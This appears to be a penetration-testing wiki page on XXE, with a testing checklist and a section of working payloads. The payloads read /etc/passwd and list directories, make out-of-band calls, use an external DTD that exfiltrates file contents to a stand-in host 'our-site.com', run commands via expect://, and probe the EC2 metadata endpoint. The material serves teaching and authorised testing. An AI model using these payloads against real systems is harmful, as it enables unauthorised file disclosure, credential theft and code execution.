XXE

What is it?

XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with internal systems, or conduct denial of service attacks.

A simple example

A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

In this case, the XML parser will replace &xxe; with the contents of the /etc/passwd file and include it in the output.

XXE can often lead to:

Disclosure of internal files
Server Side Request Forgery (SSRF)
Denial of Service
Remote Code Execution in some rare cases

Other learning resources:

PortSwigger:
OWASP:

Writeups:

Checklist

Objective

Identify endpoints that can process XML
Create a working XML payload that can be adapted to deliver exploits
Test identified endpoints for XXE

Attack surface discovery

Identify endpoints that accept XML payloads

Review requests in proxy for XML data
Identify endpoints that accept JSON by sending XML
Identify endpoints that accept images by sending SVG images
- Identify endpoints that accept documents by sending DOCX or PDF files
Test with the header Content-Type: application/xml
Verify working XML payloads that can be adapted to deliver exploits
Locate internal DTDs

Testing

Test for external entities with a simple non-malicious payload
Test for external entities with an available file (e.g. for Linux /etc/passwd)
Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site)

Test for external entities with other available endpoints

- EC2 metadata endpoint http://169.254.169.254/latest/meta-data

Test filters and restrictions

- Trigger error messages to exfiltrate information
Test for denial of service
Test for code execution

Impact

Can we read sensitive files?

Configuration files
System files
SQLite files
- SSH keys
Can we exfiltrate sensitive information?
Can we achieve code execution?

Exploitation

Sources

PortSwigger
PayloadsAllTheThings

Detect XXE

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe "test"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Include files Note: You might need "file:///etc/passwd"

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

List files: Note: Restricted to Java applications

<!--?xml version="1.0" ?-->
<!DOCTYPE aa[<!ELEMENT bb ANY>
<!ENTITY xxe SYSTEM "file:///">]>
<foo>
  <bar>&xxe;</bar>
</foo>

Out-of-band:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Parameter entities:

<!DOCTYPE ase [ <!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>

Load an external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://our-site.com/?x=%file;'>">
%eval;
%exfiltrate;

Execute code Note: Only works in the PHP 'expect' module is available

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>
    <bar>&xxe;</bar>
</foo>

Include XML as a parameter value

param=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Other sources

Fuzzing for XXE https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/XML.txt
Fuzzing for local DTDs https://github.com/GoSecure/dtd-finder/tree/master/list

PreviousCommand Injection NextBlind XXE

Last updated 11 months ago